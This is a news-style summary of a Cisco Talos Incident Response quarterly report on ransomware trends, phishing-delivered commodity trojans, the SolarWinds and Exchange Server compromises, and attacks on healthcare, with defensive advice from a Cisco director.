For the seventh quarter in a row, Cisco Talos Incident Response (CTIR) has observed ransomware dominating the threat landscape. The top variants between November 2020 and January 2021 were Ryuk and Vatet. Cisco Talos has also observed variants of Egregor and WastedLocker continuing to target organizations across the globe.
Unlike the previous quarter however, these ransomware attacks overwhelmingly relied on phishes delivering commodity trojan maldocs, such as Zloader, BazarLoader and IcedID. Nearly 70 percent of ransomware attacks relied on commodity trojans during the most recent quarter. Adversaries also employ commercially available tools such as Cobalt Strike, open-source post-exploitation tools like Bloodhound, and native tools on the victim’s system, such as PowerShell.
“Ransomware continues to be a challenging cyberthreat across industries. In the case of commodity trojans, we are referring to attacks which can be bought and sold for quick yet effective results. In some cases, commodity trojans are even made free to download. Via simple phishing emails, actors are able to infiltrate networks, gather intelligence and ultimately, cause long-term damage,” said Fady Younes, Cybersecurity Director, Middle East and Africa, Cisco.
“It is important to note that these packaged cybercrime tools are not only readily available, but are also easy for even the lesser experienced attacker to deploy. Organizations must therefore seek to constantly educate their workforces on how to identify suspicious emails and raise red flags. Decisionmakers are also responsible for effectively securing IT systems with cybersecurity measures, such as thorough patching and endpoint protection – creating the ultimate line of defense.”
CTIR also engaged in several incident response engagements in which organizations unknowingly downloaded trojanized updates to the widely deployed SolarWinds’ Orion software. Only one of these engagements involved post-compromise activity.
Following this, Microsoft announced four vulnerabilities in Exchange Server and revealed that a threat actor named Hafnium had been exploiting these vulnerabilities to drop web shells, targeting an array of organizations. Soon other threat actors began leveraging these exploits as well, ranging from APTs to cryptominer groups, with affected organizations estimated in the tens of thousands. CTIR has been responding to a growing number of incidents involving the Microsoft Exchange vulnerabilities.
Actors targeted a broad range of verticals, including business management, construction, education, energy and utilities, entertainment, financial, government, healthcare, industrial distribution, legal, manufacturing and technology.
Adversaries most often targeted the healthcare sector, part of which explains an increase involving Vatet malware, which has been known to target healthcare organizations. CTIR identified a potential pattern in which regional hospitals associated with a hospital in a given state is initially attacked and may serve as follow-on targets, particularly if they have active VPN connections to the affected organization. There are many reasons why actors are continuing to target the healthcare industry, including the COVID-19 pandemic incentivizing victims to pay to restore services as quickly as possible.